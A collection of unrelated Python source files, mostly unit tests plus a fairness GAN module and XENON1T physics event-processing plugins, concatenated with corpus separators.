# To publish a message means publishing a message on a topic received by any subscribers of the topic.
bus.Publish(payload=payload, topic='myTopic')
# Block until the user presses enter, then shut the consumers down cleanly.
input('Hit enter to stop all consuming channels \n\n')
pikaBusSetup.StopConsumers()
| StarcoderdataPython |
3251557 | <filename>end_to_end_tests/golden-record-custom/custom_e2e/__init__.py<gh_stars>0
""" A client library for accessing My Test API """
from .wrapper import MyTestAPIClient, SyncMyTestAPIClient
| StarcoderdataPython |
287583 | <reponame>tagr-dev/tagr
import unittest
import pandas as pd
from tagr.tagging.artifacts import Tagr
class TaggingTest(unittest.TestCase):
    """Unit tests for the ``Tagr`` artifact-tagging queue."""

    def __init__(self, *args, **kwargs):
        # unittest builds one instance per test method, so every test starts
        # with this fresh Tagr unless it re-creates its own.
        self.tag = Tagr()
        super().__init__(*args, **kwargs)

    def test_artfact_is_returned(self):
        """save() hands back the artifact it stored."""
        # Arrange
        test_artifact = "foo"
        # Act
        res = self.tag.save(test_artifact, "str1", "primitive")
        # Assert
        self.assertEqual(res, "foo")

    def test_save_other(self):
        """Artifacts saved with dtype 'other' round-trip unchanged."""
        test_artifact = {"test_key": "test_val"}
        res = self.tag.save(test_artifact, "dict1", "other")
        self.assertEqual(res, {"test_key": "test_val"})

    def test_save_with_no_dtype(self):
        """An unrecognized object name with no dtype raises ValueError."""
        test_artifact = "foo"
        self.assertRaises(
            ValueError, lambda: self.tag.save(test_artifact, "unrecognized_obj")
        )

    def test_save_with_unrecognized_dtype(self):
        """A bad dtype raises and must leave the queue empty."""
        test_artifact = "foo"
        self.assertRaises(
            ValueError,
            lambda: self.tag.save(test_artifact, "misnamed_dtype", "primitiveS"),
        )
        # Bug fix: measure the queue AFTER the failed save.  The length was
        # previously captured before the call, so the assertion could never
        # detect an artifact wrongly enqueued despite the error.
        queue_length = len(self.tag.ret_queue())
        self.assertEqual(queue_length, 0)

    def test_save_with_wrong_dtype(self):
        """A dataframe-implying name given a non-dataframe raises TypeError."""
        test_artifact = "foo"
        self.assertRaises(TypeError, lambda: self.tag.save(test_artifact, "X_train"))

    def test_obj_name_to_dtype_conversion(self):
        """Well-known object names imply their dtype; dtype aliases are kept."""
        data = [{"a": 1, "b": 2, "c": 3}, {"a": 10, "b": 20, "c": 30}]
        df = pd.DataFrame(data)
        self.tag.save(df, "X_train")
        df_dtype = self.tag.ret_queue()["X_train"].dtype
        self.assertEqual(df_dtype, "dataframe")
        # test aliasing
        test_int = 2
        self.tag.save(test_int, "num", "primitive")
        int_dtype = self.tag.ret_queue()["num"].dtype
        self.assertEqual(int_dtype, "primitive")

    def test_ignore_dupes(self):
        """Saving the same artifact twice stores it only once."""
        self.tag = Tagr()
        self.tag.save(2, "num", "primitive")
        self.tag.save(2, "num", "primitive")
        queue_length = len(self.tag.ret_queue())
        self.assertEqual(queue_length, 1)

    def test_rm(self):
        """rm() removes exactly the named artifact and keeps the rest."""
        expected_length = 1
        expected_val = 2
        self.tag = Tagr()
        self.tag.save(1, "int1", "primitive")
        self.tag.save(2, "int2", "primitive")
        self.tag.rm("int1")
        queue = self.tag.ret_queue()
        queue_length = len(queue)
        stored_int = queue["int2"].val
        self.assertEqual(queue_length, expected_length)
        self.assertEqual(expected_val, stored_int)

    def test_rm_error_handling(self):
        """Removing an unknown artifact raises KeyError."""
        self.tag = Tagr()
        self.assertRaises(KeyError, lambda: self.tag.rm("non_existent_obj"))

    def test_summary(self):
        """summary() reports one row per saved artifact."""
        data = [
            {"obj_name": "num1", "val": 2.0, "dtype": "primitive"},
            {"obj_name": "str1", "val": "foo", "dtype": "primitive"},
        ]
        expected_df = pd.DataFrame(data)
        self.tag = Tagr()
        self.tag.save(2, "num1", "primitive")
        self.tag.save("foo", "str1", "primitive")
        summary = self.tag.summary()
        pd._testing.assert_frame_equal(summary, expected_df)
| StarcoderdataPython |
349295 | <filename>test/solution_tests/chk/test_pricing_service.py
from lib.solutions.CHK.pricing_service import PricingService
from lib.solutions.CHK.sku_service import SkuService
from unittest.mock import MagicMock
from pytest import mark
# getting a bit like an integration test here
@mark.parametrize("basket_string,expected_output", [
    ("A", 50),
    ("AA", 100),
    ("AAA", 130),
    ("AAAA", 180),
    ("AAAAA", 200),
    ("AAAAAAAA", 330),
    ("ABCDABCD", 215),
    ("EE", 80),
    ("EEB", 80),
    ("EEBB", 110),
    ("EEBBB", 125),
    ("EEBBBBB", 170),
    ("EEEEBB", 160),
    ('BDEEE', 135),
    ("FF", 20),
    ("FFF", 20),
    ("FEFEBF", 100),
    ("H", 10),
    ("HHHHH", 45),
    ("HHHHHHHHHH", 80),
    ("HHHHHHHHHHHHHHH", 125),
    ("KK", 120),
    ("NNN", 120),
    ("MNNN", 120),
    ("PPPPP", 200),
    ("QQQ", 80),
    ("RRR", 150),
    ("RQRR", 150),
    ("UUU", 120),
    ("UUUU", 120),
    ("VV", 90),
    ("VVV", 130),
    ("STY", 45),
    ("XXX", 45),
    ("ZYX", 45),
    ("ZY", 41),
    ("XXXST", 79),
    ("XXXXXXXXX", 135),
    ("SSSZ", 65),
    ("ZZZS", 65)
])
def test_get_price(basket_string, expected_output):
    """Checkout total for each basket string matches the expected price."""
    # Prices come from the JSON SKU table, exercising the real loading path.
    sku_service = SkuService()
    service = PricingService(sku_service)
    sku_service.load_from_json_file('lib/solutions/chk/skus.json')
    price = service.get_price(basket_string)
    assert price == expected_output
| StarcoderdataPython |
5045743 | import torch
import torch.nn.functional as f
from torch import nn
import numpy as np
import pandas as pd
class Critic(nn.Module):
    """Two-layer fully connected critic with LeakyReLU activations.

    Both layers preserve the input dimensionality, so the output has the
    same shape as the input batch.
    """

    def __init__(self, input_dim):
        super(Critic, self).__init__()
        self._input_dim = input_dim
        self.dense1 = nn.Linear(self._input_dim, self._input_dim)
        self.dense2 = nn.Linear(self._input_dim, self._input_dim)

    def forward(self, x):
        """Score a batch of samples; returns a (batch, input_dim) tensor."""
        hidden = f.leaky_relu(self.dense1(x))
        return f.leaky_relu(self.dense2(hidden))
class Generator(nn.Module):
    """Generator emitting continuous columns followed by categorical blocks.

    ``discrete_columns`` maps a column name to its category count; each
    entry gets its own linear head whose logits are sampled with
    Gumbel-softmax (tau=0.2).
    """

    def __init__(self, input_dim, continuous_columns, discrete_columns):
        super(Generator, self).__init__()
        self._input_dim = input_dim
        self._discrete_columns = discrete_columns
        self._num_continuous_columns = len(continuous_columns)
        self.lin1 = nn.Linear(self._input_dim, self._input_dim)
        self.lin_numerical = nn.Linear(self._input_dim, self._num_continuous_columns)
        self.lin_cat = nn.ModuleDict()
        for name, n_categories in self._discrete_columns.items():
            self.lin_cat[name] = nn.Linear(self._input_dim, n_categories)

    def forward(self, x):
        """Map latent ``x`` to concatenated [continuous | categorical] output."""
        hidden = torch.relu(self.lin1(x))
        numerical = f.relu(self.lin_numerical(hidden))
        categorical = [
            f.gumbel_softmax(head(hidden), tau=0.2) for head in self.lin_cat.values()
        ]
        return torch.cat((numerical, *categorical), 1)
class DISPLoss(nn.Module):
    """Generator loss: demographic-disparity penalty plus the WGAN term.

    The index arguments locate, inside a generated row ``x``, the two-column
    one-hot-style blocks for the protected attribute S (at ``S_start_index``)
    and the outcome Y (at ``Y_start_index``), and which column of each block
    is the (under)privileged / (un)desired one.
    """

    def __init__(self, S_start_index, Y_start_index, underpriv_index, priv_index, undesire_index, desire_index):
        super(DISPLoss, self).__init__()
        self._S_start_index = S_start_index
        self._Y_start_index = Y_start_index
        self._underpriv_index = underpriv_index
        self._priv_index = priv_index
        self._undesire_index = undesire_index
        self._desire_index = desire_index

    def forward(self, x, crit_fake_pred, lamda, nu):
        """Return ``-lamda * disparity - mean(crit_fake_pred)``.

        ``nu`` is accepted for signature compatibility with RTRLoss but is
        not used by this loss.
        """
        G = x[:, self._S_start_index:self._S_start_index + 2]
        I = x[:, self._Y_start_index:self._Y_start_index + 2]
        # Disparity between the two groups' rates of the desired outcome;
        # each mean is normalised by that group's column sum.
        disparity = (
            torch.mean(G[:, self._underpriv_index] * I[:, self._desire_index])
            / x[:, self._S_start_index + self._underpriv_index].sum()
            - torch.mean(G[:, self._priv_index] * I[:, self._desire_index])
            / x[:, self._S_start_index + self._priv_index].sum()
        )
        # Removed: an unused "taxa_missing_data" term and the no-op
        # ``disp = disp`` left over from experimentation -- neither affected
        # the returned value.
        return -1.0 * lamda * disparity - 1.0 * torch.mean(crit_fake_pred)
class RTRLoss(nn.Module):
    """Penalty proportional to the imbalance between the two protected-group
    column sums in a batch (group counts when the columns are one-hot).
    """

    def __init__(self, S_start_index, Y_start_index, underpriv_index, priv_index, undesire_index, desire_index):
        super(RTRLoss, self).__init__()
        self._S_start_index = S_start_index
        self._Y_start_index = Y_start_index
        self._underpriv_index = underpriv_index
        self._priv_index = priv_index
        self._undesire_index = undesire_index
        self._desire_index = desire_index

    def forward(self, x, crit_fake_pred, lamda, nu):
        """Return ``nu * |priv_sum - underpriv_sum| / batch_size``.

        ``crit_fake_pred`` and ``lamda`` are accepted for signature
        compatibility with DISPLoss but do not influence the result.
        """
        underpriv_sum = x[:, self._S_start_index + self._underpriv_index].sum()
        priv_sum = x[:, self._S_start_index + self._priv_index].sum()
        # x.size(0) replaces the fragile ``.size(axis=0)`` keyword form;
        # both give the batch size.
        batch_size = x.size(0)
        # Removed: a dead disparity computation whose result was immediately
        # overwritten before being returned.
        return nu * (torch.abs(priv_sum - underpriv_sum) / batch_size)
3352359 | <gh_stars>1-10
from unittest.mock import MagicMock, call, ANY
import pytest
from openeo.internal.process_graph_visitor import ProcessGraphVisitor
def test_visit_node():
    """A single node triggers enterProcess/enterArgument with its fields."""
    node = {
        "process_id": "cos",
        "arguments": {"x": {"from_argument": "data"}}
    }
    visitor = ProcessGraphVisitor()
    visitor.enterProcess = MagicMock()
    visitor.enterArgument = MagicMock()
    visitor.accept_node(node)
    assert visitor.enterProcess.call_args_list == [
        call(process_id="cos", arguments={"x": {"from_argument": "data"}}, namespace=None)
    ]
    assert visitor.enterArgument.call_args_list == [call(argument_id="x", value={"from_argument": "data"})]
def test_visit_node_namespaced():
    """An explicit "namespace" field is forwarded to enterProcess."""
    node = {
        "process_id": "cos",
        "namespace": "math",
        "arguments": {"x": {"from_argument": "data"}}
    }
    visitor = ProcessGraphVisitor()
    visitor.enterProcess = MagicMock()
    visitor.enterArgument = MagicMock()
    visitor.accept_node(node)
    assert visitor.enterProcess.call_args_list == [
        call(process_id="cos", arguments={"x": {"from_argument": "data"}}, namespace="math")
    ]
    assert visitor.enterArgument.call_args_list == [call(argument_id="x", value={"from_argument": "data"})]
def test_visit_nodes():
    """Graph traversal visits dependencies first and resolves from_parameter."""
    graph = {
        "abs": {
            "process_id": "abs",
            "arguments": {
                "data": {
                    "from_argument": "data"
                }
            },
        },
        "cos": {
            "process_id": "cos",
            "arguments": {
                "data": {
                    "from_node": "abs"
                },
                "data2": {
                    "from_parameter": "x"
                }
            },
            "result": True
        }
    }
    visitor = ProcessGraphVisitor()
    visitor.leaveProcess = MagicMock()
    visitor.enterArgument = MagicMock()
    visitor.from_parameter = MagicMock()
    visitor.accept_process_graph(graph)
    # Dependencies are left before their dependents ("abs" before "cos").
    assert visitor.leaveProcess.call_args_list == [
        call(process_id="abs", arguments=ANY, namespace=None),
        call(process_id="cos", arguments=ANY, namespace=None),
    ]
    assert visitor.enterArgument.call_args_list == [
        call(argument_id="data", value=ANY),
        call(argument_id="data", value={"from_argument": "data"}),
        call(argument_id='data2', value={'from_parameter': 'x'})
    ]
    assert visitor.from_parameter.call_args_list == [
        call("x")
    ]
def test_visit_nodes_array():
    """Array-valued arguments trigger enterArray instead of plain enterArgument."""
    graph = {
        "abs": {
            "arguments": {
                "data": [
                    {"from_argument": "data"},
                    10.0
                ]
            },
            "process_id": "abs"
        },
        "cos": {
            "arguments": {
                "data": {
                    "from_node": "abs"
                }
            },
            "process_id": "cos",
            "result": True
        }
    }
    visitor = ProcessGraphVisitor()
    visitor.leaveProcess = MagicMock()
    visitor.enterArgument = MagicMock()
    visitor.enterArray = MagicMock()
    visitor.accept_process_graph(graph)
    assert visitor.leaveProcess.call_args_list == [
        call(process_id='abs', arguments=ANY, namespace=None),
        call(process_id='cos', arguments=ANY, namespace=None)
    ]
    assert visitor.enterArgument.call_args_list == [
        call(argument_id="data", value=ANY)
    ]
    assert visitor.enterArray.call_args_list == [
        call(argument_id="data")
    ]
def test_visit_array_with_dereferenced_nodes():
    """After dereferencing, node-valued array elements are reported via arrayElementDone."""
    graph = {
        'arrayelement1': {
            'arguments': {'data': {'from_argument': 'data'}, 'index': 2},
            'process_id': 'array_element',
            'result': False
        },
        'product1': {
            'process_id': 'product',
            'arguments': {'data': [{'from_node': 'arrayelement1'}, -1]},
            'result': True
        }
    }
    top = ProcessGraphVisitor.dereference_from_node_arguments(graph)
    dereferenced = graph[top]
    # The from_node reference was replaced by the referenced node in-place.
    assert dereferenced["arguments"]["data"][0]["arguments"]["data"]["from_argument"] == "data"
    visitor = ProcessGraphVisitor()
    visitor.leaveProcess = MagicMock()
    visitor.enterArgument = MagicMock()
    visitor.enterArray = MagicMock()
    visitor.arrayElementDone = MagicMock()
    visitor.constantArrayElement = MagicMock()
    visitor.accept_node(dereferenced)
    assert visitor.leaveProcess.call_args_list == [
        call(process_id='array_element', arguments=ANY, namespace=None),
        call(process_id='product', arguments=ANY, namespace=None)
    ]
    assert visitor.enterArgument.call_args_list == [
        call(argument_id="data", value={'from_argument': 'data'})
    ]
    assert visitor.enterArray.call_args_list == [
        call(argument_id="data")
    ]
    assert visitor.arrayElementDone.call_args_list == [
        call({
            "process_id": "array_element",
            "arguments": {"data": {"from_argument": "data"}, "index": 2},
            "result": False
        })
    ]
    assert visitor.constantArrayElement.call_args_list == [
        call(-1)
    ]
def test_dereference_basic():
    """dereference_from_node_arguments returns the result node id and embeds referenced nodes."""
    graph = {
        "node1": {},
        "node2": {
            "arguments": {
                "data1": {
                    "from_node": "node1"
                },
                "data2": {
                    "from_node": "node3"
                }
            },
            "result": True
        },
        "node3": {
            "arguments": {
                "data": {
                    "from_node": "node4"
                }
            }
        },
        "node4": {}
    }
    result = ProcessGraphVisitor.dereference_from_node_arguments(graph)
    assert result == "node2"
    # Embedded "node" entries equal the original top-level entries.
    assert graph["node1"] == graph["node2"]["arguments"]["data1"]["node"]
    assert graph["node3"] == graph["node2"]["arguments"]["data2"]["node"]
    assert graph["node4"] == graph["node3"]["arguments"]["data"]["node"]
    assert graph == {
        "node1": {},
        "node2": {
            "arguments": {
                "data1": {"from_node": "node1", "node": {}},
                "data2": {"from_node": "node3", "node": {
                    "arguments": {
                        "data": {"from_node": "node4", "node": {}},
                    }
                }},
            },
            "result": True
        },
        "node3": {
            "arguments": {
                "data": {"from_node": "node4", "node": {}},
            }
        },
        "node4": {}
    }
def test_dereference_list_arg():
    """from_node references inside list arguments are replaced by the nodes themselves."""
    graph = {
        "start": {"process_id": "constant", "arguments": {"x": "2020-02-02"}},
        "end": {"process_id": "constant", "arguments": {"x": "2020-03-03"}},
        "temporal": {
            "process_id": "filter_temporal",
            "arguments": {
                "extent": [{"from_node": "start"}, {"from_node": "end"}],
            },
            "result": True,
        },
    }
    result = ProcessGraphVisitor.dereference_from_node_arguments(graph)
    assert result == "temporal"
    assert graph == {
        "start": {"process_id": "constant", "arguments": {"x": "2020-02-02"}},
        "end": {"process_id": "constant", "arguments": {"x": "2020-03-03"}},
        "temporal": {
            "process_id": "filter_temporal",
            "arguments": {
                "extent": [
                    {"process_id": "constant", "arguments": {"x": "2020-02-02"}},
                    {"process_id": "constant", "arguments": {"x": "2020-03-03"}},
                ],
            },
            "result": True,
        },
    }
def test_dereference_dict_arg():
    """from_node references inside dict arguments gain an embedded "node" entry."""
    graph = {
        "west": {"process_id": "add", "arguments": {"x": 1, "y": 1}},
        "east": {"process_id": "add", "arguments": {"x": 2, "y": 3}},
        "bbox": {
            "process_id": "filter_bbox",
            "arguments": {
                "extent": {
                    "west": {"from_node": "west"},
                    "east": {"from_node": "east"},
                }
            },
            "result": True,
        }
    }
    result = ProcessGraphVisitor.dereference_from_node_arguments(graph)
    assert result == "bbox"
    assert graph == {
        "west": {"process_id": "add", "arguments": {"x": 1, "y": 1}},
        "east": {"process_id": "add", "arguments": {"x": 2, "y": 3}},
        "bbox": {
            "process_id": "filter_bbox",
            "arguments": {
                "extent": {
                    "west": {
                        "from_node": "west",
                        "node": {"process_id": "add", "arguments": {"x": 1, "y": 1}},
                    },
                    "east": {
                        "from_node": "east",
                        "node": {"process_id": "add", "arguments": {"x": 2, "y": 3}},
                    },
                }
            },
            "result": True,
        }
    }
def test_dereference_no_result_node():
    """A graph without any result node is rejected."""
    with pytest.raises(ValueError, match="does not contain a result node"):
        ProcessGraphVisitor.dereference_from_node_arguments({
            "node1": {},
            "node2": {}
        })
def test_dereference_multiple_result_node():
    """A graph with more than one result node is rejected."""
    with pytest.raises(ValueError, match="Multiple result nodes"):
        ProcessGraphVisitor.dereference_from_node_arguments({
            "node1": {"result": True},
            "node2": {"result": True}
        })
def test_dereference_invalid_node():
    """A from_node reference pointing outside the graph is rejected."""
    graph = {
        "node1": {},
        "node2": {
            "arguments": {
                "data": {
                    "from_node": "node3"
                }
            },
            "result": True
        }
    }
    with pytest.raises(ValueError, match="not in process graph"):
        ProcessGraphVisitor.dereference_from_node_arguments(graph)
def test_dereference_cycle():
    """Mutually referencing nodes are linked (identity) without infinite recursion."""
    graph = {
        "node1": {
            "arguments": {
                "data": {"from_node": "node2"},
            },
            "result": True
        },
        "node2": {
            "arguments": {
                "data": {"from_node": "node1"},
            }
        }
    }
    ProcessGraphVisitor.dereference_from_node_arguments(graph)
    assert graph["node1"]["arguments"]["data"]["node"] is graph["node2"]
    assert graph["node2"]["arguments"]["data"]["node"] is graph["node1"]
| StarcoderdataPython |
11202024 | import strax
import numpy as np
from straxen.common import pax_file, get_resource, get_elife, first_sr1_run
from straxen.itp_map import InterpolatingMap
export, __all__ = strax.exporter()
@export
@strax.takes_config(
    strax.Option('trigger_min_area', default=100,
                 help='Peaks must have more area (PE) than this to '
                      'cause events'),
    strax.Option('trigger_max_competing', default=7,
                 help='Peaks must have FEWER nearby larger or slightly smaller'
                      ' peaks to cause events'),
    strax.Option('left_event_extension', default=int(1e6),
                 help='Extend events this many ns to the left from each '
                      'triggering peak'),
    strax.Option('right_event_extension', default=int(1e6),
                 help='Extend events this many ns to the right from each '
                      'triggering peak'),
)
class Events(strax.OverlapWindowPlugin):
    """Group triggering peaks into events.

    A peak triggers when its area exceeds ``trigger_min_area`` and it has at
    most ``trigger_max_competing`` competing peaks; triggers closer together
    than the left+right extensions are merged into one event.
    """
    depends_on = ['peak_basics', 'peak_proximity']
    data_kind = 'events'
    dtype = [
        ('event_number', np.int64, 'Event number in this dataset'),
        ('time', np.int64, 'Event start time in ns since the unix epoch'),
        ('endtime', np.int64, 'Event end time in ns since the unix epoch')]
    # Running counter so event_number stays unique across chunks.
    events_seen = 0
    def get_window_size(self):
        # The overlap window must cover the largest possible event extent.
        return (2 * self.config['left_event_extension'] +
                self.config['right_event_extension'])
    def compute(self, peaks):
        le = self.config['left_event_extension']
        re = self.config['right_event_extension']
        # Select triggering peaks: large enough area, few competing peaks.
        triggers = peaks[
            (peaks['area'] > self.config['trigger_min_area'])
            & (peaks['n_competing'] <= self.config['trigger_max_competing'])]
        # Join nearby triggers
        t0, t1 = strax.find_peak_groups(
            triggers,
            gap_threshold=le + re + 1,
            left_extension=le,
            right_extension=re)
        result = np.zeros(len(t0), self.dtype)
        result['time'] = t0
        result['endtime'] = t1
        result['event_number'] = np.arange(len(result)) + self.events_seen
        if not result.size > 0:
            print("Found chunk without events?!")
        self.events_seen += len(result)
        return result
# TODO: someday investigate if/why loopplugin doesn't give
# anything if events do not contain peaks..
# Likely this has been resolved in 6a2cc6c
@export
class EventBasics(strax.LoopPlugin):
    """Extract basic per-event quantities: main/alternate S1 and S2
    properties, the S1-S2 drift times, and the main S2 (x, y) position.
    """
    __version__ = '0.1.2'
    depends_on = ('events',
                  'peak_basics',
                  'peak_positions',
                  'peak_proximity')
    def infer_dtype(self):
        # The per-S1/S2 fields below are generated symmetrically for i in 1, 2.
        dtype = [(('Number of peaks in the event',
                   'n_peaks'), np.int32),
                 (('Drift time between main S1 and S2 in ns',
                   'drift_time'), np.int64)]
        for i in [1, 2]:
            dtype += [
                ((f'Main S{i} peak index',
                  f's{i}_index'), np.int32),
                ((f'Main S{i} time since unix epoch [ns]',
                  f's{i}_time'), np.int64),
                ((f'Main S{i} weighted center time since unix epoch [ns]',
                  f's{i}_center_time'), np.int64),
                ((f'Alternate S{i} time since unix epoch [ns]',
                  f'alt_s{i}_time'), np.int64),
                ((f'Alternate S{i} weighted center time since unix epoch [ns]',
                  f'alt_s{i}_center_time'), np.int64),
                ((f'Main S{i} area, uncorrected [PE]',
                  f's{i}_area'), np.float32),
                ((f'Main S{i} area fraction top',
                  f's{i}_area_fraction_top'), np.float32),
                ((f'Main S{i} width, 50% area [ns]',
                  f's{i}_range_50p_area'), np.float32),
                ((f'Main S{i} number of competing peaks',
                  f's{i}_n_competing'), np.int32),
                ((f'Area of alternate S{i} in event [PE]',
                  f'alt_s{i}_area'), np.float32),
                ((f'Drift time using alternate S{i} [ns]',
                  f'alt_s{i}_interaction_drift_time'), np.float32)]
        dtype += [('x_s2', np.float32,
                   'Main S2 reconstructed X position, uncorrected [cm]',),
                  ('y_s2', np.float32,
                   'Main S2 reconstructed Y position, uncorrected [cm]',)]
        return dtype
    def compute_loop(self, event, peaks):
        """Fill the event-level fields from the peaks inside one event."""
        result = dict(n_peaks=len(peaks))
        if not len(peaks):
            return result
        main_s = dict()
        secondary_s = dict()
        # Iterate S2 first (s_i == 2): the main S2, once found, constrains
        # which peaks may still count as S1 candidates below.
        for s_i in [2, 1]:
            s_mask = peaks['type'] == s_i
            # For determining the main / alternate S1s,
            # remove all peaks after the main S2 (if there was one)
            # since these cannot be related to the main S2.
            # This is why S2 finding happened first.
            if s_i == 1 and result[f's2_index'] != -1:
                s_mask &= peaks['time'] < main_s[2]['time']
            ss = peaks[s_mask]
            s_indices = np.arange(len(peaks))[s_mask]
            if not len(ss):
                result[f's{s_i}_index'] = -1
                continue
            main_i = np.argmax(ss['area'])
            result[f's{s_i}_index'] = s_indices[main_i]
            if ss['n_competing'][main_i] > 0 and len(ss['area']) > 1:
                # Find second largest S..
                secondary_s[s_i] = x = ss[np.argsort(ss['area'])[-2]]
                for prop in ['area', 'time', 'center_time']:
                    result[f'alt_s{s_i}_{prop}'] = x[prop]
            s = main_s[s_i] = ss[main_i]
            for prop in ['area', 'area_fraction_top', 'time', 'center_time',
                         'range_50p_area', 'n_competing']:
                result[f's{s_i}_{prop}'] = s[prop]
            if s_i == 2:
                for q in 'xy':
                    result[f'{q}_s2'] = s[q]
        # Compute a drift time only if we have a valid S1-S2 pairs
        if len(main_s) == 2:
            result['drift_time'] = \
                main_s[2]['center_time'] - main_s[1]['center_time']
            if 1 in secondary_s:
                result['alt_s1_interaction_drift_time'] = \
                    main_s[2]['center_time'] - secondary_s[1]['center_time']
            if 2 in secondary_s:
                result['alt_s2_interaction_drift_time'] = \
                    secondary_s[2]['center_time'] - main_s[1]['center_time']
        return result
@export
@strax.takes_config(
    strax.Option(
        name='electron_drift_velocity',
        help='Vertical electron drift velocity in cm/ns (1e4 m/ms)',
        default=1.3325e-4
    ),
    strax.Option(
        'fdc_map',
        help='3D field distortion correction map path',
        default_by_run=[
            (0, pax_file('XENON1T_FDC_SR0_data_driven_3d_correction_tf_nn_v0.json.gz')),  # noqa
            (first_sr1_run, pax_file('XENON1T_FDC_SR1_data_driven_time_dependent_3d_correction_tf_nn_part1_v1.json.gz')),  # noqa
            (170411_0611, pax_file('XENON1T_FDC_SR1_data_driven_time_dependent_3d_correction_tf_nn_part2_v1.json.gz')),  # noqa
            (170704_0556, pax_file('XENON1T_FDC_SR1_data_driven_time_dependent_3d_correction_tf_nn_part3_v1.json.gz')),  # noqa
            (170925_0622, pax_file('XENON1T_FDC_SR1_data_driven_time_dependent_3d_correction_tf_nn_part4_v1.json.gz'))]),  # noqa
)
class EventPositions(strax.Plugin):
    """Compute field-distortion-corrected interaction positions from the
    main S2 (x, y) and the drift time.
    """
    depends_on = ('event_basics',)
    dtype = [
        ('x', np.float32,
         'Interaction x-position, field-distortion corrected (cm)'),
        ('y', np.float32,
         'Interaction y-position, field-distortion corrected (cm)'),
        ('z', np.float32,
         'Interaction z-position, field-distortion corrected (cm)'),
        ('r', np.float32,
         'Interaction radial position, field-distortion corrected (cm)'),
        ('z_naive', np.float32,
         'Interaction z-position using mean drift velocity only (cm)'),
        ('r_naive', np.float32,
         'Interaction r-position using observed S2 positions directly (cm)'),
        ('r_field_distortion_correction', np.float32,
         'Correction added to r_naive for field distortion (cm)'),
        ('theta', np.float32,
         'Interaction angular position (radians)')]
    def setup(self):
        # Load the 3D field distortion correction map once per plugin.
        self.map = InterpolatingMap(
            get_resource(self.config['fdc_map'], fmt='binary'))
    def compute(self, events):
        # Naive z from the drift time, assuming a constant drift velocity.
        z_obs = - self.config['electron_drift_velocity'] * events['drift_time']
        orig_pos = np.vstack([events['x_s2'], events['y_s2'], z_obs]).T
        r_obs = np.linalg.norm(orig_pos[:, :2], axis=1)
        delta_r = self.map(orig_pos)
        # Radial correction; warnings silenced for r_obs == 0 rows, where
        # the division yields inf/nan by construction.
        with np.errstate(invalid='ignore', divide='ignore'):
            r_cor = r_obs + delta_r
            scale = r_cor / r_obs
        result = dict(x=orig_pos[:, 0] * scale,
                      y=orig_pos[:, 1] * scale,
                      r=r_cor,
                      z_naive=z_obs,
                      r_naive=r_obs,
                      r_field_distortion_correction=delta_r,
                      theta=np.arctan2(orig_pos[:, 1], orig_pos[:, 0]))
        with np.errstate(invalid='ignore'):
            z_cor = -(z_obs ** 2 - delta_r ** 2) ** 0.5
            invalid = np.abs(z_obs) < np.abs(delta_r)  # Why??
            z_cor[invalid] = z_obs[invalid]
        result['z'] = z_cor
        return result
@strax.takes_config(
    strax.Option(
        's1_relative_lce_map',
        help="S1 relative LCE(x,y,z) map",
        default_by_run=[
            (0, pax_file('XENON1T_s1_xyz_lce_true_kr83m_SR0_pax-680_fdc-3d_v0.json')),  # noqa
            (first_sr1_run, pax_file('XENON1T_s1_xyz_lce_true_kr83m_SR1_pax-680_fdc-3d_v0.json'))]),  # noqa
    strax.Option(
        's2_relative_lce_map',
        help="S2 relative LCE(x, y) map",
        default_by_run=[
            (0, pax_file('XENON1T_s2_xy_ly_SR0_24Feb2017.json')),
            (170118_1327, pax_file('XENON1T_s2_xy_ly_SR1_v2.2.json'))]),
    strax.Option(
        'elife_file',
        default='https://raw.githubusercontent.com/XENONnT/strax_auxiliary_files/master/elife.npy',
        help='link to the electron lifetime'))
class CorrectedAreas(strax.Plugin):
    """Apply position-dependent light-collection and electron-lifetime
    corrections to the main S1 and S2 areas.
    """
    depends_on = ['event_basics', 'event_positions']
    dtype = [('cs1', np.float32, 'Corrected S1 area (PE)'),
             ('cs2', np.float32, 'Corrected S2 area (PE)')]
    def setup(self):
        # LCE maps plus this run's electron lifetime.
        self.s1_map = InterpolatingMap(
            get_resource(self.config['s1_relative_lce_map']))
        self.s2_map = InterpolatingMap(
            get_resource(self.config['s2_relative_lce_map']))
        self.elife = get_elife(self.run_id,self.config['elife_file'])
    def compute(self, events):
        event_positions = np.vstack([events['x'], events['y'], events['z']]).T
        s2_positions = np.vstack([events['x_s2'], events['y_s2']]).T
        # Compensate charge lost to attachment during the drift.
        lifetime_corr = np.exp(
            events['drift_time'] / self.elife)
        return dict(
            cs1=events['s1_area'] / self.s1_map(event_positions),
            cs2=events['s2_area'] * lifetime_corr / self.s2_map(s2_positions))
@strax.takes_config(
    strax.Option(
        'g1',
        help="S1 gain in PE / photons produced",
        default_by_run=[(0, 0.1442),
                        (first_sr1_run, 0.1426)]),
    strax.Option(
        'g2',
        help="S2 gain in PE / electrons produced",
        default_by_run=[(0, 11.52/(1 - 0.63)),
                        (first_sr1_run, 11.55/(1 - 0.63))]),
    strax.Option(
        'lxe_w',
        help="LXe work function in quanta/keV",
        default=13.7e-3),
)
class EnergyEstimates(strax.Plugin):
    """Convert corrected S1/S2 areas into energy estimates (keVee)."""
    __version__ = '0.0.1'
    depends_on = ['corrected_areas']
    dtype = [
        ('e_light', np.float32, 'Energy in light signal [keVee]'),
        ('e_charge', np.float32, 'Energy in charge signal [keVee]'),
        ('e_ces', np.float32, 'Energy estimate [keVee]')]

    def compute(self, events):
        light_energy = self.cs1_to_e(events['cs1'])
        charge_energy = self.cs2_to_e(events['cs2'])
        return dict(
            e_light=light_energy,
            e_charge=charge_energy,
            e_ces=light_energy + charge_energy,
        )

    def cs1_to_e(self, x):
        """Energy from the corrected S1: w * cs1 / g1."""
        return self.config['lxe_w'] * x / self.config['g1']

    def cs2_to_e(self, x):
        """Energy from the corrected S2: w * cs2 / g2."""
        return self.config['lxe_w'] * x / self.config['g2']
class EventInfo(strax.MergeOnlyPlugin):
    """Merge all event-level data kinds into one flat output."""
    depends_on = ['events',
                  'event_basics', 'event_positions', 'corrected_areas',
                  'energy_estimates']
    # Always persist the merged result, regardless of storage defaults.
    save_when = strax.SaveWhen.ALWAYS
| StarcoderdataPython |
8107745 | from cassandra.cqlengine import columns
from cassandra.cqlengine.models import Model
class SampleCoverage(Model):
    """Coverage metrics keyed for sample-centric queries: ``sample`` is the
    partition key; amplicon/run/library/program complete the primary key.
    """
    __keyspace__ = 'coveragestore'
    sample = columns.Text(primary_key=True, partition_key=True)
    amplicon = columns.Text(primary_key=True)
    run_id = columns.Text(primary_key=True)
    library_name = columns.Text(primary_key=True)
    program_name = columns.Text(primary_key=True)
